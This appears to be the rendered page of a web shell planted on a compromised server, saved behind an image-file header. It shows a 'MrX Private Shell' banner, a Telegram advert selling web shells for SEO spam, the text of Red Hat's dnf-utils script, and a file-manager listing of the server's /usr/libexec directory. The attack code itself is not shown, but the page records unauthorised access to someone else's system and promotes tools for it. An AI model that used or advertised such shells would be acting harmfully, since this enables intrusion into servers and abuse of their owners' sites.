����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
#!/usr/libexec/platform-python
# The dnf-utils executable script.
#
# Copyright (C) 2017 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# the GNU General Public License v.2, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the
# GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA. Any Red Hat trademarks that are incorporated in the
# source code or documentation are not subject to the GNU General Public
# License and may only be used or replicated with the express permission of
# Red Hat, Inc.
#
from __future__ import unicode_literals
import sys
import os.path
MAPPING = {'debuginfo-install': ['debuginfo-install'],
'needs-restarting': ['needs-restarting'],
'find-repos-of-install': ['list', 'installed'],
'package-cleanup': [],
'repo-graph': ['repograph'],
'repoclosure': ['repoclosure'],
'repodiff': ['repodiff'],
'repomanage': ['repomanage'],
'repoquery': ['repoquery'],
'reposync': ['reposync'],
'repotrack': ['download', '--resolve', '--alldeps'],
'yum-builddep': ['builddep'],
'yum-config-manager': ['config-manager'],
'yum-debug-dump': ['debug-dump'],
'yum-debug-restore': ['debug-restore'],
'yum-groups-manager': ['groups-manager'],
'yumdownloader': ['download']
}
def suppress_keyboard_interrupt_message():
"""Prevent unsightly KeyboardInterrupt tracebacks.
Nothing will be printed to the terminal after an uncaught
:class:`exceptions.KeyboardInterrupt`.
"""
old_excepthook = sys.excepthook
def new_hook(type, value, traceback):
if type != KeyboardInterrupt:
old_excepthook(type, value, traceback)
else:
pass
sys.excepthook = new_hook
# do this ASAP to prevent tracebacks after ^C during imports
suppress_keyboard_interrupt_message()
if __name__ != "__main__":
sys.stderr.write('The executable DNF module must not be imported.')
sys.exit(1)
here = sys.path[0]
if here != '/usr/bin':
# git checkout
import os
dnf_toplevel = os.path.dirname(here)
sys.path[0] = dnf_toplevel
from dnf.cli import main
command = os.path.basename(sys.argv[0])
args = sys.argv[1:]
if command == 'package-cleanup':
if '--dupes' in args:
args[args.index('--dupes')] = '--duplicates'
MAPPING[command] = ['repoquery']
elif '--leaves' in args:
args[args.index('--leaves')] = '--unneeded'
MAPPING[command] = ['repoquery']
elif '--orphans' in args:
args[args.index('--orphans')] = '--extras'
MAPPING[command] = ['repoquery']
elif '--problems' in args:
args[args.index('--problems')] = '--unsatisfied'
MAPPING[command] = ['repoquery']
elif '--cleandupes' in args:
args[args.index('--cleandupes')] = '--duplicates'
MAPPING[command] = ['remove']
else:
sys.stderr.write('package-cleanup has to be executed with one of the options: --dupes, '
'--leaves, --orphans, --problems or --cleandupes\n')
sys.exit(1)
main.user_main(MAPPING[command] + args, exit_code=True)
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| awk | Folder | 0755 |
|
|
| coreutils | Folder | 0755 |
|
|
| cpanel-pdns | Folder | 0755 |
|
|
| dbus-1 | Folder | 0755 |
|
|
| dovecot | Folder | 0755 |
|
|
| fwupd | Folder | 0755 |
|
|
| gawk | Folder | 0755 |
|
|
| gcc | Folder | 0755 |
|
|
| getconf | Folder | 0755 |
|
|
| grubby | Folder | 0755 |
|
|
| hostname | Folder | 0755 |
|
|
| imunify-notifier | Folder | 0755 |
|
|
| initscripts | Folder | 0755 |
|
|
| installkernel | Folder | 0755 |
|
|
| linux-boot-probes | Folder | 0755 |
|
|
| man-db | Folder | 0755 |
|
|
| microcode_ctl | Folder | 0755 |
|
|
| nfs-utils | Folder | 0755 |
|
|
| openldap | Folder | 0755 |
|
|
| openssh | Folder | 0755 |
|
|
| os-prober | Folder | 0755 |
|
|
| os-probes | Folder | 0755 |
|
|
| p11-kit | Folder | 0755 |
|
|
| plymouth | Folder | 0755 |
|
|
| selinux | Folder | 0755 |
|
|
| smartmontools | Folder | 0755 |
|
|
| sssd | Folder | 0755 |
|
|
| sudo | Folder | 0755 |
|
|
| tuned | Folder | 0755 |
|
|
| udisks2 | Folder | 0755 |
|
|
| utempter | Folder | 0755 |
|
|
| audit-functions | File | 990 B | 0750 |
|
| dirmngr_ldap | File | 87.33 KB | 0755 |
|
| dnf-utils | File | 3.62 KB | 0755 |
|
| ebtables | File | 1.33 KB | 0755 |
|
| exim.daemon | File | 758 B | 0755 |
|
| generate-rndc-key.sh | File | 546 B | 0755 |
|
| gpg-check-pattern | File | 111.91 KB | 0755 |
|
| gpg-preset-passphrase | File | 87.23 KB | 0755 |
|
| gpg-protect-tool | File | 206.38 KB | 0755 |
|
| gpg-wks-client | File | 227.23 KB | 0755 |
|
| grepconf.sh | File | 253 B | 0755 |
|
| import-state | File | 1.03 KB | 0755 |
|
| imunify-message-gateway | File | 7.95 MB | 0755 |
|
| loadmodules | File | 233 B | 0755 |
|
| nfsrahead | File | 37.15 KB | 0755 |
|
| nm-daemon-helper | File | 12.6 KB | 0755 |
|
| nm-dhcp-helper | File | 16.2 KB | 0755 |
|
| nm-dispatcher | File | 66.16 KB | 0755 |
|
| nm-initrd-generator | File | 740.48 KB | 0755 |
|
| no-python | File | 157 B | 0755 |
|
| platform-python | File | 11.59 KB | 0755 |
|
| platform-python-config | File | 204 B | 0755 |
|
| platform-python3.6 | File | 11.59 KB | 0755 |
|
| platform-python3.6-config | File | 204 B | 0755 |
|
| platform-python3.6m | File | 11.59 KB | 0755 |
|
| platform-python3.6m-config | File | 204 B | 0755 |
|
| platform-python3.6m-x86_64-config | File | 3.54 KB | 0755 |
|
| report-command-error | File | 8.37 MB | 0755 |
|
| run-with-intensity | File | 6.36 MB | 0755 |
|
| scdaemon | File | 442.41 KB | 0755 |
|
| virt-what-cpuid-helper | File | 7.91 KB | 0755 |
|
| xb-tool | File | 24.78 KB | 0755 |
|